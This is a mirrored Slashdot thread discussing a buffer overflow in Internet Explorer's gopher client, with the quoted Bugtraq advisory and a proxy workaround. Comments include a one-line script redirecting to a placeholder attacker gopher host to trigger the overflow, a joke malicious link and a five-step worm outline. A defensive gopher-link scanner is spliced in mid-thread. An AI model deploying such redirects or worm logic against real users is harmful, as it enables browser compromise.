Slashdot Mirror


Latest IE Hole Lets Gopher Root You

rvaniwaa writes "Another hole in Internet Explorer has been discovered. This hole allows a hacker to root a user's computer whenever the user clicks on a gopher link. All versions of IE are affected, and a Microsoft spokesman stated that the company is 'moving forward on the investigation with all due speed.'"

17 of 533 comments

  1. Too damn obvious by CaseyB · · Score: 5, Funny

    Let the "gopher hole" jokes begin.

    1. Re:Too damn obvious by Jucius Maximus · · Score: 5, Insightful
      Just one question:

      Why the h3ll is anyone motivated to find bugs in IE's gopher protocols?!? It must have been a real slow day at Oy Online Solutions for them to find this.

  2. New MS Hacker Slogan by Anonymous Coward · · Score: 5, Funny

    "Where do you want to gopher today?"

  3. Re:All three gopher links left.. by linderdm · · Score: 5, Insightful

    I agree that there may not be many gopher links that look like gopher links, but what stops the malicious from disguising their gopher links to look like regular hrefs?

  4. well you can't expect... by arson1 · · Score: 5, Funny

    Well you can't expect Microsoft to keep up with all these new technologies and formats!

    --
    Don't sweat the petty things, and don't pet the sweaty things.
  5. The remedy by sh0rtie · · Score: 5, Informative

    To protect from potential exploiting, you can temporarily disable the gopher
    protocol like this:

    Go to Tools -> Internet options -> Connections. Click on "LAN settings".
    Check "Use a proxy server for your LAN". Click on "Advanced...".

    Go to the Gopher text field
    and enter "localhost", and "1" in the port field. This will stop Internet
    Explorer from showing and processing any gopher pages.

    This will protect you for now, at least until M$ pull their finger out.

  6. Re:All three gopher links left.. by Simon Brooke · · Score: 5, Informative
    Speaking as a person who used to use gopher quite a bit - how many gopher links are left on the WWW? Three?

    That really isn't the point. It would not take many minutes to put up a gopher server with a Win 32 rootkit as content, and then put an innocent but interesting looking link into a web page ('free live world cup scores' would do nicely just now) with an href pointing to that server, and, ideally, one of those annoying JavaScript scrollers in the browser status display to prevent the user from noticing they're about to click a gopher link, and, hey! That's a few more suckers rooted. It will probably go through most firewalls, too.

    If you (or your organisation) still use Internet Explorer, I would treat this as serious. Change your default IE install to have gopher point to a safe machine of your own; block gopher at your firewall; and, ideally, switch to Opera 6, Netscape 6, or Mozilla as your organisation's default browser.

    This isn't going to be the last security hole found in IE.

    --
    I'm old enough to remember when discussions on Slashdot were well informed.
  7. Re:Stats, anyone? by sh0rtie · · Score: 5, Informative

    Yep, this site specialises in just that:
    Here

    Also Georgi Guninski does some research here:
    Here

    and Mr Malware:
    Here

  8. Official Bugtraq Post by PunchMonkey · · Score: 5, Informative

    The Official Bugtraq Post:

    OVERVIEW
    ========

    Gopher is a protocol developed at the University of Minnesota in the
    early 1990's. Gopher servers offer hierarchically organized directories
    and files. These form a "gopherspace" which can be thought of as the
    predecessor of the World Wide Web. Gopher was mostly abandoned soon after
    HTTP and the World Wide Web started gaining popularity.

    Microsoft Internet Explorer has a built-in gopher client. Gopher pages can
    be accessed via URLs starting with "gopher://". The part of code in IE
    which parses gopher replies contains an exploitable buffer overflow
    bug. A malicious server may be used to run arbitrary code on an IE user's
    system.

    DETAILS
    =======

    When the overflow is triggered, a fixed sized buffer in stack gets
    overwritten with data from the gopher server. This data can contain most
    octets from 0 to 255 (also nulls) which makes it particularly easy to
    inject a working shellcode in it. This is a traditional, trivially
    exploitable buffer overflow. A test exploit has been successfully used to
    run arbitrary code without user intervention with various IE versions and
    systems including IE 5.5 and 6.0.

    The attack can be launched via a web page or an HTML mail message which
    redirect the user to a malicious gopher server when the victim views them.
    The server can be very minimal, i.e. a program that can listen on a TCP
    port and write a block of data; a fully operational gopher server isn't
    necessary in order to carry out the attack.

    The exploiter could do anything that a regular user could do on the
    system: retrieve, install, or remove files, upload and run programs, etc.

    Full technical details aren't disclosed at this time to prevent
    exploitation.

    WORKAROUND
    ==========

    Internet Explorer users can protect themselves from the flaw by disabling
    the gopher protocol. Barely any gopher servers exist on the Internet
    today, so this is unlikely to cause problems. If needed, a gopher client
    or some other web browser can be used to access the gopherspace.

    An easy way to disable processing and displaying gopher pages is to define
    a non-functional gopher proxy in Internet Options. Select Tools ->
    Internet options -> Connections. Click on "LAN settings". Check "Use a
    proxy server for your LAN". Click on "Advanced...". Here you can define
    proxy servers to be used with different protocols. Go to the Gopher text
    field and enter "localhost", and "1" in the port text field. This will
    stop Internet Explorer from fetching any gopher documents.

    After installing the patch from Microsoft you can remove these gopher
    proxy settings (or restore them to values they had before).

    For more information and a vulnerability test see
    http://www.solutions.fi

    VENDOR STATUS
    =============

    Microsoft was contacted on May 20th. At the moment of writing this
    advisory, Microsoft has started designing and coding a fix, but hasn't
    given any approximation of when it would be released. The patch will be
    available at

    http://www.microsoft.com/technet/security/current.asp

    when it is completed.

    --
    I'll have something intelligent to add one of these days...
  9. Active gopher sites. by AJWM · · Score: 5, Interesting
    The last time I actually used a gopher site was about a year ago, some wire service was running it for its news stories.

    However, a quick search turns up several still-active gophers, for example:
    gopher://gopher.umsl.edu/
    gopher://gopher.cac.psu.edu/
    (These actually return data -- some others I found the server up but no data returned).

    As to why gopher died out, Tim Berners-Lee offers the following:

    "It was just about this time, spring 1993, that the University of Minnesota decided that it would ask for a license fee from certain classes of users who wanted to use gopher. Since the gopher software was being picked up so widely, the university was going to charge an annual fee. The browser, and the act of browsing, would be free, and the server software would remain free to nonprofit and educational institutions. But any other users, notably companies, would have to pay to use gopher server software.

    "This was an act of treason in the academic community and the Internet community. Even if the university never charged anyone a dime, the fact that the school had announced it was reserving the right to charge people for the use of the gopher protocols meant it had crossed the line. To use the technology was too risky. Industry dropped gopher like a hot potato."

    (from his book, Weaving the Web)

    --
    -- Alastair
  10. Re:All three gopher links left.. by kesuki · · Score: 5, Insightful

    Nothing... a simple redirect page can force the gopher link to be opened without the user even being asked to click anything. Not to mention JavaScript. Anything that allows all those pop-up and pop-under ads can just as easily open a gopher link.

  11. What the hell is this about? by drew_kime · · Score: 5, Insightful
    A Microsoft spokesman who refused to be identified said Tuesday ...

    And just why should we trust anything this guy says? Their official spokesman won't even stand by what he's saying. And what is he saying, anyway?

    Refusing to confirm the security flaw, the Microsoft spokesman said the company "feel(s) strongly that speculating on the issue while the investigation is in progress would be irresponsible and counterproductive to our goal of protecting our customers' information."

    And the spokesman added, "Responsible security researchers work with the vendor of a suspected vulnerability issue to ensure that countermeasures are developed before the issue is made public and customers are needlessly put at risk."

    So again, as far as Microsoft is concerned, it's the fault of the people who publicized it. It's prudent to assume these guys are not the only ones who know about the problem. Which means my information is already at risk.

    So if there are people out there who can compromise my system, why shouldn't I be able to find out about it and take preventive measures? Why should I have to wait until Microsoft -- who haven't even admitted to the vulnerability yet, two weeks after being told about it -- get around to fixing it?

    --
    Nope, no sig
  12. Get Your Easy Fix Right Here!!!! by kryzx · · Score: 5, Funny
    It is really easy to fix this problem with this script I wrote. Just click on the link below to get it.

    gopher://gopher.URr00t3d.ru

    --
    "I don't know half of you half as well as I should like, and I like less than half of you half as well as you deserve."
  13. Re:Yay I'M SAFE! by zulux · · Score: 5, Funny

    The best thing about Windows?

    It forced me to learn to spell 'administrator.'

    Kinda like how FTP forced me to learn to spell 'anonymous.'

    Or somthing.

    --

    Moneyed corporations, non-working 'poor' and criminal prisoners are turning productive citizens into tax-slaves.

  14. Re:Wow... by Gerv · · Score: 5, Insightful

    most important of these that gopher is absolutely archaic.

    <script>
    document.location.replace("gopher://evil.gopherserver.com:7000/buffer_overflow/");
    </script>

    Second, as always, Microsoft will have a patch out fairly quickly, which is more than can be said for Mozilla half of the time...

    I'm amazed at how you split one security hole (XMLHTTPRequest) in two to make a "half the time"... :-)

    Incidentally, the patch for XMLHTTPRequest was in nightly builds within 48 hours of the bug report, and in the next milestone within about a week. In contrast, there are currently 17 unpatched holes in IE. What was that you were saying about "quickly"?

    Gerv
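
The disguised-link and redirect scenarios raised by linderdm, kesuki and in the script quoted above are something a defender can check pages and HTML mail for before they reach IE. The following is an added example, not code from any poster: a small Python scanner, run over constructed sample HTML (hosts and paths are made up), that reports every href, meta refresh or script redirect that would make the browser fetch a gopher:// URL.

```python
import re
from html.parser import HTMLParser

# Constructed sample (not from the thread): a disguised href, a meta refresh and a script redirect.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0; url=gopher://198.51.100.7:7000/1menu">
<script>document.location.replace("GOPHER://menu.example.net:7000/buffer_overflow/");</script>
</head><body>
<a href="http://example.org/scores">scores</a>
<a href="gopher://198.51.100.7/1free-world-cup-scores">free live world cup scores</a>
</body></html>"""

GOPHER = re.compile(r"^\s*gopher:", re.IGNORECASE)               # scheme check, any case
META_URL = re.compile(r"url\s*=\s*['\"]?([^'\";\s>]+)", re.IGNORECASE)
JS_NAV = re.compile(r"location(?:\.(?:href|replace|assign))?\s*[=(]\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)

class GopherRefFinder(HTMLParser):
    """Record each place a page would make the browser fetch a gopher URL."""
    def __init__(self):
        super().__init__()
        self.findings = []          # (where, url) pairs, in document order
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)             # HTMLParser lower-cases attribute names
        if tag == "script":
            self._in_script = True
        for key in ("href", "src", "action"):     # links, frames, images, forms
            if a.get(key) and GOPHER.match(a[key]):
                self.findings.append((f"{tag}[{key}]", a[key].strip()))
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = META_URL.search(a.get("content") or "")   # redirect, no click needed
            if m and GOPHER.match(m.group(1)):
                self.findings.append(("meta-refresh", m.group(1)))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:         # location.replace("gopher://...") and friends
            for m in JS_NAV.finditer(data):
                if GOPHER.match(m.group(1)):
                    self.findings.append(("script-redirect", m.group(1)))

def find_gopher_references(html):
    p = GopherRefFinder()
    p.feed(html)
    p.close()
    return p.findings
```

Running `find_gopher_references(SAMPLE_HTML)` returns the meta refresh, the script redirect and the disguised anchor, in that order, while the plain http link is ignored.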

  15. Even tho gopher is dead, this is a problem by joshv · · Score: 5, Insightful

    Everyone keeps saying "but there are like three gopher servers left out there". This is not the point. Any buffer overflow in the IE client code which is exploitable is a huge problem. It doesn't matter that there are damned few servers left that use the exploitable protocol. A malicious server need not even be a fully functioning gopher server, it just needs to listen for requests on the right port and respond appropriately. A worm'ed IIS server could fit the bill quite nicely.

    A smart worm could:
    1. Infect an IIS server via some unfixed hole, or backdoor left by another worm.
    2. Open up a dummy gopher port which responds to all requests with the exploit.
    3. Replace links on the web site the IIS server serves with links to the gopher server exploit.
    4. The worm installs itself on all client machines that click the gopher links and begins scanning for vulnerable servers.
    5. Goto 1.

    None of this has anything to do with the number of gopher servers left on the Internet.

    -josh

  16. Re:My thoughts: by sphealey · · Score: 5, Insightful
    The existence of the exploit in the first place is troubling, but the *really serious* problem is #3, where almost nobody installs the patch until it is too late. Basically, Microsoft may not care as much about security as the security experts do, but the sad truth is that many users and even sysadmins care even less.

    Well, yes. OTOH, you missed Step 3a, where the Microsoft patch breaks numerous mission-critical non-Microsoft applications. Office 97 SP2 was a classic here: Novell Netware clients never worked the same after that one was installed. Necessary for security I am sure. And NT SP6, which broke Lotus Notes.

    You also missed step 2.9, where the hapless sysadmin spends 3 days trying to figure out Microsoft's patch dependency tree, which is not published. And even M$ admits that they use different, and incompatible, patch mechanisms for different product lines. So if I pull out the install disk to add an additional function to Visio, do I have to reinstall Office XP patches? Why or why not?

    sPh